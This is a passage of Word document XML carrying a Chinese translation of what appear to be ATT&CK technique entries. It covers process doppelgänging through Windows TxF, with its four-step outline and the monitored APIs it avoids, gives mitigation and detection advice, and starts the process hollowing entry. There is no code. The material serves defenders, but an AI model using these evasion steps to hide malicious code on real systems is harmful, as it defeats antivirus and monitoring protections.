      <w:r w:rsidRPr="00E4152C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">TxF </w:t>
      </w:r>
      <w:r w:rsidRPr="00E4152C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>只允许一个事务处理句柄在给定时间写入文件。在写入句柄事务终止之前，所有其他句柄都与编写器隔离，并且只可能读取打开句柄时存在的文件的已提交版本。为了避免损坏，如果系统或应用程序在写入事务期间发生故障，</w:t>
      </w:r>
      <w:r w:rsidRPr="00E4152C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">TxF </w:t>
      </w:r>
      <w:r w:rsidRPr="00E4152C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>会执行自动回滚。</w:t>
      </w:r>
      <w:hyperlink r:id="rId118" w:tgtFrame="_blank" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="af4"/>
            <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
            <w:color w:val="4F7CAC"/>
            <w:sz w:val="18"/>
            <w:szCs w:val="18"/>
            <w:vertAlign w:val="superscript"/>
          </w:rPr>
          <w:t>]</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7D304DE0" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00E4152C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>尽管已弃用，但</w:t>
      </w:r>
      <w:r w:rsidRPr="00E4152C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> TxF </w:t>
      </w:r>
      <w:r w:rsidRPr="00E4152C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>应用程序编程接口</w:t>
      </w:r>
      <w:r w:rsidRPr="00E4152C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E4152C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r w:rsidRPr="00E4152C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>API</w:t>
      </w:r>
      <w:r w:rsidRPr="00E4152C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r w:rsidRPr="00E4152C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在</w:t>
      </w:r>
      <w:r w:rsidRPr="00E4152C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Windows 10 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中</w:t>
      </w:r>
      <w:r w:rsidRPr="00E4152C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>仍处于启用状态。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4128875B" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="009A0204" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击者</w:t>
      </w:r>
      <w:r w:rsidRPr="009A0204">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可能会利用</w:t>
      </w:r>
      <w:r w:rsidRPr="009A0204">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> TxF </w:t>
      </w:r>
      <w:r w:rsidRPr="009A0204">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>执行称为多普勒格进程的</w:t>
      </w:r>
      <w:r w:rsidRPr="009A0204">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r w:rsidRPr="00C412B2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>进程注入</w:t>
      </w:r>
      <w:r w:rsidRPr="009A0204">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r w:rsidRPr="009A0204">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的无文件变体。与</w:t>
      </w:r>
      <w:r w:rsidRPr="009A0204">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r w:rsidRPr="00C412B2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>进程空心</w:t>
      </w:r>
      <w:r w:rsidRPr="009A0204">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r w:rsidRPr="009A0204">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>类似，多普勒格进程涉及替换合法进程的内存，从而能够隐晦地执行可能逃避防御和检测的恶意代码。多普勒格进程对</w:t>
      </w:r>
      <w:r w:rsidRPr="009A0204">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>TxF</w:t>
      </w:r>
      <w:r w:rsidRPr="009A0204">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的使用还避免了使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>被</w:t>
      </w:r>
      <w:r w:rsidRPr="009A0204">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>高度监控的</w:t>
      </w:r>
      <w:r w:rsidRPr="009A0204">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> API </w:t>
      </w:r>
      <w:r w:rsidRPr="009A0204">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>函数，如</w:t>
      </w:r>
      <w:r w:rsidRPr="009A0204">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> NtUnmapViewOfsection</w:t>
      </w:r>
      <w:r w:rsidRPr="009A0204">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>VirtualProtectEx</w:t>
      </w:r>
      <w:r w:rsidRPr="009A0204">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidRPr="009A0204">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> SetThreadContext</w:t>
      </w:r>
      <w:r w:rsidRPr="009A0204">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ADD8700" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="009A0204">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>多普勒格</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>进程</w:t>
      </w:r>
      <w:r w:rsidRPr="009A0204">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>通过</w:t>
      </w:r>
      <w:r w:rsidRPr="009A0204">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidRPr="009A0204">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>个步骤实现：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F90D5C8" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="afd"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Times New Roman"/>
          <w:color w:val="39434C"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="626617C5" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00AF6363" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="ItemList"/>
        <w:ind w:left="1587" w:hanging="822"/>
      </w:pPr>
      <w:r w:rsidRPr="00AF6363">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>事务</w:t>
      </w:r>
      <w:r w:rsidRPr="00AF6363">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AF6363">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidRPr="00AF6363">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AF6363">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用合法的可执行文件创建</w:t>
      </w:r>
      <w:r w:rsidRPr="00AF6363">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> TxF </w:t>
      </w:r>
      <w:r w:rsidRPr="00AF6363">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>事务，然后用恶意代码覆盖文件。这些更改将是孤立的，并且仅在本次事务的上下文中可见。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01AAD0AA" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00AF6363" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="ItemList"/>
        <w:ind w:left="1587" w:hanging="822"/>
      </w:pPr>
      <w:r w:rsidRPr="00AF6363">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>加载</w:t>
      </w:r>
      <w:r w:rsidRPr="00AF6363">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AF6363">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidRPr="00AF6363">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AF6363">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>创建一个内存的共享区域并加载恶意可执行文件。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1113B30C" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00AF6363" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="ItemList"/>
        <w:ind w:left="1587" w:hanging="822"/>
      </w:pPr>
      <w:r w:rsidRPr="00AF6363">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>回滚</w:t>
      </w:r>
      <w:r w:rsidRPr="00AF6363">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AF6363">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidRPr="00AF6363">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AF6363">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>消对原始可执行文件的更改，有效地从文件系统中删除恶意代码。</w:t>
      </w:r>
      <w:r w:rsidRPr="00AF6363">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BC88A0F" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00AF6363" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="ItemList"/>
        <w:ind w:left="1587" w:hanging="822"/>
      </w:pPr>
      <w:r w:rsidRPr="00AF6363">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>启动</w:t>
      </w:r>
      <w:r w:rsidRPr="00AF6363">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AF6363">
        <w:t xml:space="preserve">– </w:t>
      </w:r>
      <w:r w:rsidRPr="00AF6363">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>从内存的污染部分创建进程并启动执行。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="176542DC" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
      </w:pPr>
      <w:r>
        <w:t>缓解</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22C2AA7F" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00AA10CB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这种类型的攻击技术无法通过预防性控制轻松缓解，因为它基于系统功能的滥用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="211382EF" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>检测</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0492D887" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="009D0575" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="009D0575">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>表明</w:t>
      </w:r>
      <w:r w:rsidRPr="009D0575">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">TxF </w:t>
      </w:r>
      <w:r w:rsidRPr="009D0575">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>活动</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidRPr="009D0575">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>创建</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>事务</w:t>
      </w:r>
      <w:r w:rsidRPr="009D0575">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、创建文件</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>事务</w:t>
      </w:r>
      <w:r w:rsidRPr="009D0575">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、回滚事务和其他很少使用的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>函数</w:t>
      </w:r>
      <w:r w:rsidRPr="009D0575">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的调用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>进行</w:t>
      </w:r>
      <w:r w:rsidRPr="009D0575">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>监视和分析。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>多普勒进程</w:t>
      </w:r>
      <w:r w:rsidRPr="009D0575">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>还通过调用</w:t>
      </w:r>
      <w:r w:rsidRPr="009D0575">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> NtCreateProcessEx </w:t>
      </w:r>
      <w:r w:rsidRPr="009D0575">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidRPr="009D0575">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> NtCreateThreadEx </w:t>
      </w:r>
      <w:r w:rsidRPr="009D0575">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>调用</w:t>
      </w:r>
      <w:r w:rsidRPr="009D0575">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="009D0575">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>过时且未记录</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidRPr="009D0575">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Windows </w:t>
      </w:r>
      <w:r w:rsidRPr="009D0575">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>进程加载器的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>实现</w:t>
      </w:r>
      <w:r w:rsidRPr="009D0575">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，以及用于修改另一进程中的内存的</w:t>
      </w:r>
      <w:r w:rsidRPr="009D0575">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> API </w:t>
      </w:r>
      <w:r w:rsidRPr="009D0575">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>调用（如</w:t>
      </w:r>
      <w:r w:rsidRPr="009D0575">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> WriteProcessMemory</w:t>
      </w:r>
      <w:r w:rsidRPr="009D0575">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10897462" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="009D0575" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="009D0575">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>扫描在</w:t>
      </w:r>
      <w:r w:rsidRPr="009D0575">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> PsSetCreateProcessNotifyRoutine </w:t>
      </w:r>
      <w:r w:rsidRPr="009D0575">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>期间报告的文件对象</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="009D0575">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>每当创建或删除进程时都会触发回调，特别是查找具有启用写入访问权限的文件对象。还考虑将内存中加载的文件对象与磁盘上的相应文件进行比较。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04429611" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="009D0575">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>分析进程行为以确定进程是否执行它通常不执行的操作，例如打开网络连接、读取文件或与危害后行为相关的其他可疑操作。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0983C213" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>进程替换</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="1560" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8176"/>
      </w:tblGrid>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00671A0D" w14:paraId="5761E886" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8176" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1EB919B6" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>编号：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>T1093</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3E1C278B" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>技术：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>防御逃逸</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5925E3D3" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>平台：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>Windows</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1DA1F7D0" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>所需权限：用户</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="69AC9816" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>数据源：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>进程</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>监控，</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>API</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>监控</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1D5386AB" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>绕过的防御：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>进程白名单，文件名或路径白名单，基于签名的检测，防病毒</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="28621F92" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>版本：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>1.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="62223744" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:left="1560"/>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="55AF1CB2" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>进程</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>替换</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>指的是挂起状态</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>下创建的</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>进程内存被取消映射且替换为恶意代码。与进程注入类似，恶意代码的执行在合法进程下被屏蔽且可能逃避防御和检测分析。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39ECAF35" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>缓解</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="480A563A" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这种类型的攻击技术基于系统功能的滥用，无法通过预防性控制来轻松缓解其造成的影响。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F9ABDF8" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00671A0D">
        <w:t>检测</w:t>
